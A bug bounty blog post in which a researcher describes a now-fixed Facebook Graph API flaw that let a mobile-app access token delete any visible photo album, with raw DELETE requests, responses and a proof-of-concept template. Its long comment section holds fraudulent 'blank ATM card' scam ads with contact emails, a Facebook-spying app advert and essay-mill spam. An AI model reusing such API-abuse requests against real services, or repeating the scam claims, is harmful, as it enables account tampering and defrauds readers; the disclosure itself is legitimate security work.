How I Hacked Your Facebook Photos - Deleting any photo albums

How i hacked your Facebook Photos

What if your photos get deleted without your knowledge?

Obviously that's very disgusting isn't it? Yup this post is about a vulnerability found by me which allows a malicious user to delete any photo album on Facebook. Any photo album owned by an user or a page or a group could be deleted.


Graph API is primary way for developers to read and write the users data. All the Facebook apps of now are using Graph API. In general Graph API requires an access token to read or write users data. Read more about Graph API here

According to Facebook developers documentation, photo albums cannot be deleted using the album node in Graph API.

Facebook Photo Delete Hack Graph API

I tried to delete one of my photo albums using graph explorer access token.

Request :-
DELETE /518171421550249 HTTP/1.1
Host :  graph.facebook.com 
Content-Length: 245
access_token=CAACEdEose0cBAABAXPPuULhNCsYZA2cgSbajNEV99ZCHXoNPvp6LqgHmTNYvuNt3e5DD4wZA1eAMflPMCAGKVlaDbJQXPZAWqd3vkaAy9VvQnxyECVD0DYOpWm3we0X3lp6ZB0hlaSDSkbcilmKYLAzQ6ql1ChyViTiSH1ZBvrjZAH3RQoova87KKsGJT3adTVZBaDSIZAYxRzCNtAC0SZCMzKAyCfXXy4RMUZD

Response :-
{"error":{"message":"(#200) Application does not have the capability to make this API call.","type":"OAuthException","code":200}}

Why? Because this application doesn't have the capability to delete photo album. But we need to note the error message. It tells us that some other application does have the capability to make this API call :P 

I decided to try it with Facebook for mobile access token because it is a top-level access token which have some extra permissions. Facebook mobile apps uses the same Graph API. so took an album id & Facebook for android access token of mine and tried it.

Request :-
DELETE /518171421550249 HTTP/1.1
Host :  graph.facebook.com 
Content-Length: 245
access_token=<Facebook_for_Android_Access_Token>

Response :-
true

Album(518171421550249) got deleted :D so whats the next step? Took victim's album id and tried to delete it. I was very curious to see the result. 

Request :-
DELETE /518171421550249 HTTP/1.1
Host :  graph.facebook.com 
Content-Length: 245
access_token=<Facebook_for_Android_Access_Token>

Response :-
true

OMG :D the album got deleted! So what? i got access to delete all of your Facebook photos (photos which are public or the photos i could see) :P lol :D 
Immediately reported this bug to Facebook security team. They were too fast in identifying this issue and there was a fix in place in less than 2 hours from the acknowledgement of the report. 

Read more about getting Facebook for android access token [Capture Android HTTP/HTTPS Traffic].

Final Proof Of Concept :-

Request :-
DELETE /<Victim's_photo_album_id> HTTP/1.1
Host :  graph.facebook.com 
Content-Length: 245
access_token=<Your(Attacker)_Facebook_for_Android_Access_Token>

if you aren't sure about how to do it, please see this video [How I Hacked Your Public Facebook Photos]

First acknowledgement from Facebook security team


Facebook Security Team Acknowledgement of Delete Photo Albums Bug

Acknowledgement of fix and rewarded me $12500 USD for reporting this vulnerability.

Facebook Photo Delete Hack Reward $12500 USD


Now its completely fixed.

Error message of delete photos hack



I thank Facebook Security Team for running bug bounty program and also for quickly fixing this issue :)

You can also read about my latest finding hacking Facebook account private photos.

HALL OF FAME : https://www.facebook.com/whitehat/thanks 
Topping the list :D

Laxman Muthiyah Facebook Whitehat Hacker Updated List 2015


Share on Google Plus

About Laxman Muthiyah

    Blogger Comment
    Facebook Comment

110 comments:

  1. Nice, Congo man.
    So it was your blog ah?

    ReplyDelete
    Replies
    1. MUST READ!!!!
      Hey Guys!!! I got mine from Rebecca. My blank ATM card can withdraw €2,000 daily. I got it from Her last week Wednesday and now I have €7,000 for free. The card withdraws money from any ATM machines and there is no name on it, it is not traceable and now i have money for bussiness and enough money for me and my 4 kids. I am really happy i met Rebecca because i met two people before him and they took my money not knowing that they were scams. But am happy now. Rebecca sent the card through DHL and i got it in two days. Get one from her now she is not like other scammer pretending to have the ATM card,She is giving it out to help people even if it is illegal but it helps a lot and no one ever gets caught. The card works in all countries except Philippines, Mali and Nigeria. Rebecca's email address is rebeccabrown328@gmail.com

      Delete
  2. How do you get Facebook for Android access token?

    ReplyDelete
    Replies
    1. You can get it by intercepting Facebook mobile application requests.

      Delete
    2. Can anyone tell how to intercept mobile app request?or some good tutorial post on it will be helpful...

      Delete
    3. I think a simple MITM with Wireshark would do. Search for both and you'll find plenty of tutorials

      Delete
  3. Congratulations, you should have been hired by facebook

    ReplyDelete
  4. Great Job Bro,Keep up the good wok :)

    ReplyDelete
  5. Scary bug but good that it got fixed

    ReplyDelete
  6. Can you tell me the name of the chrome plugin please? I like the background on google

    ReplyDelete
    Replies
    1. https://chrome.google.com/webstore/category/themes?hl=en

      Delete
  7. Isn't there a zero missing from the bounty amount, for such a potentially disastrous bug?

    ReplyDelete
  8. Can you please name the Chrome plugin for web developers?

    ReplyDelete
    Replies
    1. Are you referring to the firefox plugin? At 2:57? Its a firefox plugin called hackbar

      Delete
  9. Vc e bom mesmo é fazer grande trabalho

    ReplyDelete
  10. Vc e bom mesmo é fazer grande trabalho

    ReplyDelete
  11. Hi

    I am working on one project name http://www.seestatus.com this is also a social network website can we work together we need a person like you my number 07044283747

    ReplyDelete
  12. Replies
    1. Thank you Rafay Baloch :) Glad to hear from you :)

      Delete
  13. This comment has been removed by the author.

    ReplyDelete
  14. great work bro congrtas ! thanks you will great inspiration to upcoming students to find bugs and become whitehats ,

    ReplyDelete
  15. ¿sabes como podría verificar mi página de facebook?

    ReplyDelete
  16. Very awesome! Do you have any other tutorials or tips on how to hack. I'm new to this topic but very curious, seems fun.

    ReplyDelete
    Replies
    1. Hopefully i ll be posting soon. Stay tuned :)

      Delete
  17. I was surprised my cover photo was mysteriously gone--from my personal profile and page. I suspected it was an error...Thanks for updating the Facebook team. #Peace

    ReplyDelete
  18. how did u send this bug to facebook???
    there is an option called report problem if we send any message .they are not responding ...

    ReplyDelete
    Replies
    1. If you find a security vulnerability report it here https://www.facebook.com/whitehat/report

      For more details
      https://www.facebook.com/whitehat/

      Delete
  19. This comment has been removed by the author.

    ReplyDelete
  20. Great Discovery Bro, You inspire so many of us who want to do the same. Keep it up, Hope to Connect with you soon.

    ReplyDelete
  21. Which software did you use to intercept Facebook mobile's traffic? Fiddler or Wireshark maybe?

    ReplyDelete
  22. Hi! I'm an Uruguayan journalist and I'd like to ask you some questions. Can you tell me your e-mail? Thank you very much.

    ReplyDelete

  23. Es hora de saber quien es tú amigo hipócrita,quien habla mal de ti, si tu novio/a te es fiel, con está aplicación podrás tener vigilado el facebook de tús hijos, evitar secuestros, violaciones entre otras. Muchos ya han usado la aplicación y aseguran 100% de funcionalidad.¿Que esperáis? Sal de dudas ya.

    *PAGINA DE LA APLICACIÓN: http://donhacker.com/ *

    ReplyDelete
  24. Awesome job bro...

    I'm very happy hearing that there are some good whitehats in India also..
    Congrats..




    Can you suggest me some great free online learning place for web development???

    ReplyDelete
    Replies
    1. https://www.tutorialspoint.com this is one cool place to start. Make use of websites like stackoverflow if you have some knowledge in web dev.

      Delete
  25. But my albums are getting deleted as soon as I post them! Please help.

    ReplyDelete
    Replies
    1. Please give me brief details.
      -laxmanmuthiyah@gmail.com

      Delete
  26. Excellent work, I would not want to quarrel with you;) Have you received an award from Facebook?

    ReplyDelete
  27. This comment has been removed by the author.

    ReplyDelete
  28. Waw so simple but so nice! It's incredible... I mean, of course you're really smart and this was a great hack bu everybody could do this in few hours without a huge knowledge! That's so surprinsing!
    You also were able to delete posts and publish, Right?

    ReplyDelete
  29. This comment has been removed by a blog administrator.

    ReplyDelete
  30. This comment has been removed by a blog administrator.

    ReplyDelete
  31. i hack bit can not delete :(

    ReplyDelete
  32. Luxman which subject do you studied in college?

    ReplyDelete
  33. How you get access token which never expires because mine is expires in one hour

    ReplyDelete
  34. This comment has been removed by a blog administrator.

    ReplyDelete
  35. This comment has been removed by a blog administrator.

    ReplyDelete
  36. Hello , I have this error: HOST: .................... PORT: ...................

    ReplyDelete
  37. This comment has been removed by a blog administrator.

    ReplyDelete
  38. Hello.. M in a big problem and i hope i will get solution from this site..Actually my friends facebook profile has been hacked.. Somebody has created the public page with her name which contains all her pictures amd posts.. Everytime she posts or put pictures on her facebook page that public page also did the same..That page is not genuine and contains very bad comments in it..And the big problem is it contains my picture too..I want to know how to delete my picture from dat page beacuse i dont want it to remain there..Also how can we delete that page?? Please help me.. This is a big trouble for a girl..

    ReplyDelete
  39. Hello.. Ι ΑΜ in a big problem and i hope i will get solution from this site..Actually my friend's facebook profile has been hacked.. Somebody has created the public page with her name which contains all her pictures amd posts.. Everytime she posts or put pictures on her facebook page that public page also did the same..That page is not genuine and contains very bad comments in it..And the big problem is it contains my picture too..I want to know how to delete my picture from that page beacuse i dont want it to remain there..Also how can we delete that page?? Please help me.....

    ReplyDelete
  40. Virtually , you can use this method to delete any photo albums that belongs to a user who have registered to your facebook app , not any facebook user.

    ReplyDelete
    Replies
    1. This comment has been removed by the author.

      Delete
    2. This comment has been removed by the author.

      Delete
  41. Nice find. Keep inspiring people. :) I have one silly question, hope i will get the answer. I cannot understand how is it showing "facebook for android" with app id, in APP ID section on your access token page.
    I actually created one facebook page long back and it is showing that page app id in the access token page.

    ReplyDelete
  42. My photos have been deleted like this... Please help me to get them back please

    ReplyDelete
  43. Cipto Junaedy Seminar YUK! Belajar Bisnis ala Cipto Junaedy "Pelopor Strategi Beli Property Tanpa Utang" yg dinobatkan sbg Pelayan Publik Terbaik di Bidang Bisnis.

    ReplyDelete
  44. Hi,

    I am new to bug bounty, can u tell me how did u intercept using burp suite, the Facebook does not allow me to use burp suite, it gives invalid certificate

    ReplyDelete
    Replies
    1. Please install burp's CA Certificate
      https://portswigger.net/burp/help/proxy_options_installingCAcert.html

      Delete
  45. BE SMART AND BECOME RICH IN LESS THAN 48 hours....It all depends on how fast you can be to get the new PROGRAMMED blank ATM card that is capable of hacking into any ATM machine,anywhere in the world. I got to know about this BLANK ATM CARD when I was searching for job online about a month ago..It has really changed my life for good and now I can say I'm rich and I can never be poor again. The least money I get in a day with it is about $30,000.Every now and then I keeping pumping money into my account. Though is illegal,there is no risk of being caught ,because it has been programmed in such a way that it is not traceable,it also has a technique that makes it impossible for the CCTVs to detect you..For details on how to get yours today, email the hackers on : (jamesoliverblankatmhackers@outlook.com ). Tell your loved once too, and start to live large. That's the simple testimony of how my life changed for good...Love you all ...the email address again is willsmithatmhacker@gmail.com

    ReplyDelete
  46. Thank you for this useful and interesting information! I like it! I hope, i'll never have such problems. My site http://www.essay-mania.com.

    ReplyDelete
  47. THis is a good post.I am a professional writer. Our writing online services helps student for writing dissertation and essay like writing documents. Dissertation and essays are not a difficult task. Scholarship essay writing service can helps student in their completion of task

    ReplyDelete
  48. i want to share my experience with every body,. i thought making money was by power, till i got in contact with one mrs rita, that told me about one blank atm card that can withdraw up to $50,000, and it can be used all over the world, so i ask her?, where will the money be coming out from, so she told me that it has no registered account number that they are all universal machine that it was hack with a software, but gave some principle about the atm card, saying i must not withdraw more than the amount the card was program to withdraw, and ask me to give a try and see what will happen, so i gave it a try, to my biggest surprise it was true, it was like a dream to me, now, i am able to do what i was not able to do before,i have raised money to live a good life with it, so if mrs rita can put a stop to my needy life,i believe she can do the same for you, if you out there want to put a stop to your needy life i advise you to get your blank atm card from mrs rita, because she is a real source of getting this atm card without stress, you can email mrs rita on atmmachine54@gmail.com

    ReplyDelete
  49. i want to share my testimony with every one out there, about how i got my already program blank atm card, i thought making money was by power till i got in contact with one mrs christiana when i was seaching for a job online, that told me about one blank atm card that can withdraw the maximum of $50.000 and the transaction is untraceable and can be use in any part of the world, so i ask the lady a question? where will the money be coming out from, she said that it has know registered account, that it was hack with a blank atm card soft ware, to me i thought it was one of this internet scam, so after a lot of question and answer, i decided to take a risk and give it a try, because that was what my mum always tells me, to give it a try, so i gave it a try, to my biggest surprise it was real, i said to my self, there is this kind of brake through and i was suffering my self over nothing, since i have got my already program atm card, things are going easier for me, planning a very good apartment for my self and my family and car, i know it ilega but we are living large with it, a lot of stress have been cleared out of my way through this blank atm card, if you are interested of getting this card, i will advise you to get yours from mrs christiana because she is a good reliable source of getting this card, without delay or stress, email her on atmmachine472@gmail.com.

    ReplyDelete
  50. I just want to share my experience with everyone. I have being hearing about this blank ATM card for a while and i never really paid any interest to it because of my doubts. Until one day i discovered a hacking man called Robert. he is really good at what he is doing. Back to the point, I inquired about The Blank ATM Card. If it works or even Exist. They told me Yes and that its a card programmed for random money withdraws without being noticed and can also be used for free online purchases of any kind. This was shocking and i still had my doubts. Then i gave it a try and asked for the card and agreed to their terms and conditions. Hoping and praying it was not a scam. One week later i received my card and tried with the closest ATM machine close to me, It worked like magic. I was able to withdraw up to $10,000. This was unbelievable and the happiest day of my life. So far i have being able to withdraw up to $58000 without any stress of being caught. I don't know why i am posting this here, i just felt this might help those of us in need of financial stability. blank ATM has really change my life. If you want to contact them, Here is the email address (unlimitedblankatmcardcreator@gmail.com)

    ReplyDelete
  51. i want to share my testimony of how i got my already program atm card, i was browsing when i came accross one suzan luis who told me about one blank atm card that withdraw money from any atm machine without been trace, and it has no registered account number that it was hack with a software, to me i said impossible how can a blank atm card withdraw money and it has no registered account,she convince me to an extend i gave it a second thought and decided to take a risk and gave it a try but she gave me some instruction, so we both talked about the sale and delivery of the card to me i requested for the atm card i recieved it after two day, i tested it with one universal atm machine, i withdraw the sum of $50,000 on that day, i was so surprise,i was living in the street of califonia, but now i have an apartment to my self and a car, it beat my imagination, this blank atm card just gave an opportunity to change my life if you also want that same opportunity of changing your life the same way i did you can as well get your atm card and i will advise you to get yours from mrs rita because, she be trusted and she is an expert when it comes to hacking, mrs rita on atmmachine54@gmail.com.

    ReplyDelete
  52. Facebook is very important part in our every days lifes, you can laughing but I'm pretty sure about this.Every morning I drive to college and see people with mobile phones in their hands and chating, reading posts all the time.That's why I think your post can be useful for many of them.Also if you need to order review or essay, you can do it on www.fresh-essay.com, without any problems.

    ReplyDelete